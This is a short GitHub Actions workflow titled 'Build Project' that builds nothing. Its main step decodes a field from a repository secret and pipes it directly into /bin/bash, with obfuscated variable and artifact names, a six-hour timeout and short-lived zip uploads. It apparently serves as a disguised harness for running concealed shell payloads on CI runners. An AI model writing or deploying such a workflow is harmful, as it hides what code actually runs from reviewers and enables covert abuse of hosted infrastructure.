name: Build Project
on:
  workflow_dispatch:

env:
  CI: true
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  agent:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          vaak29: ${{ secrets.vaak29 }}
        run: |
          printf '%s' "$vaak29" | jq -r .yqx87 | /bin/bash
          printf '%s' "$umty68250" | jq -r .hen33658 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: elMc5VND
          path: "*.zip"
          retention-days: 1
